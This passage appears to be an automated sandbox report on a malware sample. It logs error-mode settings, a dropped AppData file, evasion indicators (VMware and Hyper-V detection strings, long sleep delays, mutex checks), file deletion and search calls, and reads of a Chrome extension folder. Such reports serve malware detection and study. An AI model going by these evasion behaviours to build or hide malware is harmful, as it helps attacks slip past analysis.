                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,20_2_02CA3862
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_22-890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: aspnet_compiler.exe, 0000000D.00000002.2020078270.000000000099B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: 49C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: B70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: 24A0000 memory reserve | memory write watch
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,20_2_02CA16C7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7145Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2427Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5396Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 462Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4519Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 868Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2362Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 857Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 7145 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 2427 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3428Thread sleep count: 462 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5444Thread sleep count: 4519 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5444Thread sleep time: -451900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3684Thread sleep count: 868 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3684Thread sleep time: -86800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5444Thread sleep count: 2362 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5444Thread sleep time: -236200s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugf TID: 7208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7928Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7964Thread sleep count: 73 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7964Thread sleep time: -73000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7904Thread sleep count: 88 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7904Thread sleep time: -88000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 7744Thread sleep count: 81 > 30
                Source: C:\Windows\explorer.exe TID: 7744Thread sleep time: -81000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7560Thread sleep count: 52 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 7560Thread sleep time: -52000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 6120Thread sleep count: 71 > 30
                Source: C:\Windows\explorer.exe TID: 6120Thread sleep time: -71000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\icgfugf TID: 2496Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02792B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,17_2_02792B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02793ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,17_2_02793ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02791D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,17_2_02791D4A
                Source: C:\Windows\explorer.exeCode function: 18_2_001930A8 FindFirstFileW,FindNextFileW,FindClose,18_2_001930A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F5255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,19_2_02F5255C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,20_2_02CA14D8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,20_2_02CA13FE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,20_2_02CA15BE
                Source: C:\Windows\explorer.exeCode function: 21_2_005D1EB4 FindFirstFileW,FindNextFileW,FindClose,21_2_005D1EB4
                Source: C:\Windows\explorer.exeCode function: 21_2_005D1DB0 FindFirstFileW,FindNextFileW,FindClose,21_2_005D1DB0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02796512 GetSystemInfo,17_2_02796512
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: explorer.exe, 0000000E.00000000.2000536859.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000004.00000002.1767676409.00000000081F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
                Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000007.00000003.1734913528.00000000055EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l#
                Source: powershell.exe, 00000004.00000002.1767676409.00000000081F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000007.00000003.1734913528.00000000055EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 00000008.00000002.2071104914.000000000B951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                Source: explorer.exe, 0000000E.00000000.2000536859.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 0000000E.00000000.2000536859.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
